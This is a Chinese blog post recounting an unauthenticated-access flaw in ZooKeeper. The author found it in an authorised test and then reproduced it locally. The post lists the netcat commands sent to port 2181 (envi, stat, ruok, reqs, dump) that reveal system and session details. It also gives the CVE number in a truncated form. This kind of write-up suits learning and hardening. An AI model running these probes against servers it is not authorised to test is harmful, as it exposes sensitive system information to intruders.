zookeeper未授权漏洞实战+复现

已于 2022-08-24 08:47:32 修改
阅读量7.8k 收藏 6
点赞数
分类专栏: 渗透测试 实战 文章标签: zookeeper 分布式 网络安全 web安全
于 2022-05-12 15:59:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55716222/article/details/124732332
版权

声明:该文章来自笔者日常学习笔记,未经授权,严禁转载,如需转载,评论留言。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章笔者和本博客无关。

测试授权目标时,通过工具扫描出了zookeeper未授权(CVE-2014-085)

之后就是进行漏洞利用

由于目标系统较敏感,没有执行其它操作,所以准备本地复现

Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,安装zookeeper后 默认端口为2181

这个为配置文件

直接进行漏洞利用

echo envi |nc xxxxx   2181

直接输出目标服务器环境信息,非常详细

os名称 版本  服务器名称 版本  绝对路径  等等非常多

echo stat |nc xxxxx   2181

 连接数 版本 模式等等

echo ruok |nc xxxx   2181

 查看服务器状态

echo reqs |nc xxxx  2181

 未完成的请求,我这里是无请求

echo dump |nc xxxx  2181

 会话以及节点信息

只知道这些漏洞利用,最后附上一张可以理解为log的图片

 详细记录了攻击者的动作

当时工具扫描出了该端口,在写报告时想着用nmap扫描一下,发现却扫描不出该端口,应该是做了某些屏蔽处理吧,让我不得不深思,大佬就是大佬,越小众的工具,可能越好用吧,努力成为大佬。。。

水平有限 多多包含,单纯记录,请不要做违法行为

小白牛啊
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2014-0085 zookeeper授权访问POCsuite自动化脚本
afei001
07-27 685
这是基于POCsuite的zookeeper授权访问POCsuite自动化脚本。
zookeeper授权访问修复建议
07-14
zookeeper授权访问修复建议
zookeeper授权访问漏洞处理
weixin_50016127的博客
06-27 1万+
zookeeper授权访问漏洞处理
存在 ZooKeeper 授权访问【原理扫描】--通过防火墙策略进行修复
qyq88888的专栏
06-06 511
ELK集群存在 ZooKeeper 授权访问【原理扫描】
ZooKeeper 授权访问漏洞CVE-2014-085) 复现
热门推荐
gclome的博客
07-31 1万+
最近想收集一下近几年的通用型漏洞,然后就找到了这个漏洞,那就先来这个漏洞吧! 01 ZooKeeper授权访问漏洞是什么 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。 ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、
ZooKeeper 授权访问漏洞利用
tangshuangsss的专栏
12-21 7664
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,它是一个为分布式应用提供一致性服务的软...
如何快速上手 Zookeeper 授权漏洞_zookeeper-unauth(1)
2401_83946044的博客
04-16 455
第一步:我们需要先连接上 Zookeeper 并得到数据,搜索一下 node.js 有没有相关连接 Zookeeper 的模块,运气很好找到了node-zookeeper-client这个模块,它提供了连接函数和一些处理数据的函数。第二步:我们的 extension.js 需要和弹出的 html 窗口进行双向的数据传输,这里参考了@go0p 师傅的 Redis-cli 插件写法(下载完插件在 extensions 目录下找到插件文件夹查看)。extension.js 内容如下。
如何快速上手 Zookeeper 授权漏洞_zookeeper-unauth,经典好文
2401_83946044的博客
04-16 446
【代码】如何快速上手 Zookeeper 授权漏洞_zookeeper-unauth,经典好文。
Docker授权访问漏洞详解
m0_64481831的博客
06-11 1216
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
Redis授权访问漏洞实战
yuan_boss的博客
09-01 1345
​ 本文章主要是针对于vulhub靶场中的Redis 4.x/5.x 主从复制导致的命令执行进行复现,部分复现步骤可以参考vulhub靶场,这里我提供了利用POC工具验证的步骤,相比vulhub更加详细简单。漏洞原理Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。本篇文章需要用到的工具下载地址在复现授权访问漏洞之前,我们有必要先大致的了解一下Redis是什么,Redis的简单使用与Redis授权访问漏洞的危害。
ZooKeeper 授权访问漏洞处理方法
08-31
ZooKeeper 授权访问漏洞处理方法和重设setAcl,需要设置超级管理密码后,方可修改
Zookeeper授权访问测试问题
09-29
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。这篇文章主要介绍了Zookeeper授权访问测试,需要的朋友可以参考下
Springboot+dubbo+zookeeper+swagger+mybatisplus+mysql
06-30
这个项目组合"Springboot+dubbo+zookeeper+swagger+mybatisplus+mysql"正是为了实现这样的目标而设计的。让我们逐一深入探讨这些技术组件及其在系统中的作用。 首先,Spring Boot是Spring框架的一个精简版,它旨在...
二十几种授权访问漏洞合集
2301_76786857的博客
01-13 1442
授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。攻击者发现并且利用此类漏洞的成本低,效果明显,影响巨大,因此此类漏洞必须高度重视起来。目前主要存在授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTP,Jenkins,MongoDB,Redis,ZooKeeper,ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等。
【吊打面试官系列-ZooKeeper面试题】Zookeeper 的典型应用场景
java1234的博客
07-23 256
Zookeeper 的典型应用场景
Window下安装Zookeeper
予怀的博客
07-23 390
本文介绍了在window下安装zookeeper
第13周 简历职位功能开发与Zookeeper实战
最新发布
与海
07-24 330
参考案例group by分组后会返回每组一条数据over窗口函数配合聚合函数使用,在分组的基础上,返回所有行数据并将聚合函数结果作为新列返回。
ZooKeeper 授权访问漏洞,如何复现
02-22
你需要攻击者有充足的网络访问权限才能复现 ZooKeeper 授权访问漏洞。攻击者可以使用与 ZooKeeper 兼容的客户端软件尝试连接到 ZooKeeper 节点,以检查是否存在授权访问的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值